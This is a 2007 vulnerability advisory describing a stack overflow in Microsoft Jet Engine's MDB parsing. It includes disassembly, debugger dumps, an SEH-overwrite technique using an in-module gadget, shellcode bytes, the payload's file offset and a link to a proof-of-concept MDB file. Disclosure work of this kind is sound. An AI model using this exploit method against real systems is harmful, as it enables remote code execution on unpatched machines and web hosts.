Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability
by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net
Summary:
A remote code execute vulnerability exists in Microsoft Jet Engine. A remote attacker who successfully exploit this vulnerability can execute arbitrary code on the affected system.
Affected Software Versions:
Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
(Other versions may also be affected)
Details:
When Microsoft Office Access parsing a MDB file, it will call the Jet Engine (msjet40.dll) to parse it. See the attched file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb", it will cause a stack overflow vulnerability finally in the following codes:
(C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)
.text:1B0B72BB mov ecx, edx ; ecx=0x5200
.text:1B0B72BD mov esi, edi ; esi point to the datas
.text:1B0B72BF mov ebp, ecx ; which can be find in the mdb file
.text:1B0B72C1 lea edi, [esp+40h] ; edi point to stack memory
.text:1B0B72C5 shr ecx, 2
.text:1B0B72C8 rep movsd ; stack overflow!!
.text:1B0B72CA mov ecx, ebp
.text:1B0B72CC mov eax, [eax+1]
.text:1B0B72CF and ecx, 3
.text:1B0B72D2 rep movsb
Debug Informations as follows:
eax=05f5cb67 ebx=05e66458 ecx=00005200 edx=00005200 esi=05f5cd12 edi=0013db60
eip=1b0b72c5 esp=0013db20 ebp=00005200 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
0:000> u eip
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
1b0b72c8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
1b0b72ca 8bcd mov ecx,ebp
1b0b72cc 8b4001 mov eax,dword ptr [eax+1]
1b0b72cf 83e103 and ecx,3
1b0b72d2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
1b0b72d4 8bb424d4000000 mov esi,dword ptr [esp+0D4h]
1b0b72db 8b4b28 mov ecx,dword ptr [ebx+28h]
0:000> db esi
05f5cd12 00 4f 00 53 00 7e 00 31-00 5c 00 56 00 42 00 41 .O.S.~.1.\.V.B.A
05f5cd22 00 5c 00 56 00 42 00 41-00 36 00 5c 00 56 00 42 .\.V.B.A.6.\.V.B
05f5cd32 00 45 00 36 00 2e 00 44-00 4c 00 4c 00 23 00 56 .E.6…D.L.L.#.V
05f5cd42 00 69 00 73 00 75 00 61-00 6c 00 20 00 42 00 61 .i.s.u.a.l. .B.a
05f5cd52 00 73 00 69 00 63 00 20-00 46 00 6f 00 72 00 20 .s.i.c. .F.o.r.
05f5cd62 00 41 00 70 00 70 00 6c-00 69 00 63 00 61 00 74 .A.p.p.l.i.c.a.t
05f5cd72 00 69 00 6f 00 6e 00 73-00 00 00 00 00 00 00 00 .i.o.n.s……..
05f5cd82 00 00 00 00 00 12 01 2a-00 5c 00 47 00 7b 00 34 …….*.\.G.{.4
0:000> db edi
0013db60 09 00 00 00 01 00 00 00-18 00 00 00 9a 51 00 1b ………….Q..
0013db70 86 ce 00 1b 00 c0 f5 05-02 00 00 00 e8 dc 13 00 …………….
0013db80 22 7c 00 1b 0c 11 f4 05-e8 dc 13 00 c0 10 f4 05 "|…………..
0013db90 3c cd 00 1b c0 10 f4 05-00 c0 f5 05 9c 78 e6 05 <…………x..
0013dba0 e8 dc 13 00 05 10 92 7c-38 78 e6 05 eb cb 00 1b …….|8x……
0013dbb0 80 9f a4 05 b0 98 a4 05-01 00 00 00 f2 cb 00 1b …………….
0013dbc0 9c 78 e6 05 e8 dc 13 00-4c dc 13 00 4c dc 13 00 .x……L…L…
0013dbd0 01 00 00 00 60 f3 00 1b-80 9f a4 05 02 00 00 00 ….`………..
The length of 0x5200 is enough to make us to write datas to the address where the SEH handle pointer is, so that we can rewrite the SEH handle. I use following address to jump to shellcode:
1B0D4C42 FF55 0C call dword ptr [ebp+C]
This address is also in msjet40.dll, so it can bypass the security feature of SEH in Windows XP SP2, and [ebp+0Ch] happens to point to the source data.
Debug Informations:
eax=00000000 ebx=00000000 ecx=1b0d4c42 edx=7c9237d8 esi=00000000 edi=00000000
eip=1b0d4c42 esp=0013d750 ebp=0013d770 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
msjet40!Ordinal310+0x17e:
1b0d4c42 ff550c call dword ptr [ebp+0Ch] ss:0023:0013d77c=0013e184
0:000> dd ebp
0013d770 0013d820 7c92378b 0013d838 0013e184
0013d780 0013d854 0013d80c 1b0d4c42 00140000
0013d790 0013d838 0013e184 7c957860 0013d838
0013d7a0 0013e184 0013d854 0013d80c 1b0d4c42
0013d7b0 00140000 0013d838 05f5f1b2 00000000
0013d7c0 00000000 05e66458 01000000 0013d774
0013d7d0 01c8281c 0013da04 7c92ee18 7c98d8a8
0013d7e0 ffffffff 7c98d886 7c969d18 04ba0000
0:000> db 0013e184
0013e184 75 06 74 04 42 4c 0d 1b-fc e8 44 00 00 00 8b 45 u.t.BL….D….E
0013e194 3c 8b 7c 05 78 01 ef 8b-4f 18 8b 5f 20 01 eb 49 <.|.x…O.._ ..I
0013e1a4 8b 34 8b 01 ee 31 c0 99-ac 84 c0 74 07 c1 ca 0d .4…1…..t….
0013e1b4 01 c2 eb f4 3b 54 24 04-75 e5 8b 5f 24 01 eb 66 ….;T$.u.._$..f
0013e1c4 8b 0c 4b 8b 5f 1c 01 eb-8b 1c 8b 01 eb 89 5c 24 ..K._………\$
0013e1d4 04 c3 31 c0 64 8b 40 30-85 c0 78 0c 8b 40 0c 8b [email protected]..@..
0013e1e4 70 1c ad 8b 68 08 eb 09-8b 80 b0 00 00 00 8b 68 p…h……….h
0013e1f4 3c 5f 31 f6 60 56 89 f8-83 c0 7b 50 68 7e d8 e2 <_1.`V….{Ph~..
Content at [ebp+0c]:
|75 06| + |74 04| + |42 4C 0D 1B| + |FC E8 44 00 …
{JNZ 6} + {JZ 4} + 1B0D4C42h + shellcode
Related content in the attached file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" is from the offset 0x3336 of beginning of the file.
Notice that because the vulnerability is in the Jet Engine, some web space providers may also be affected, the attacker can upload the .asp and .mdb file, and exploit it via the Server Object "ADODB.Connection".
How to Reproduce:
Open the attached file "Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access 2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please do not use the exploit for attacking.
The attached file is at:
http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.rar
MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6
Vendor Response:
Microsoft replied me that they would not fix this vulnerability, it looks like they will not acknowledge vulnerabilities which are from .mdb file.
"You appear to be reporting an issue with a file type Microsoft considers to be unsafe. Many programs, such as Internet Explorer and Outlook, automatically block these files. For more information, please visit http://support.microsoft.com/kb/925330"
Disclosure Timeline:
2007.11.06 Vendor notified via email
2007.11.07 Vendor responded
2007.11.16 Advisory released
–EOF–